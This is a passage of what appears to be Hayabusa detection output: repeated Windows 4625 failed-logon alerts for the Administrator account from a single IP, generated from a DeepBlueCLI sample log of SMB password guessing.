2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:18.765 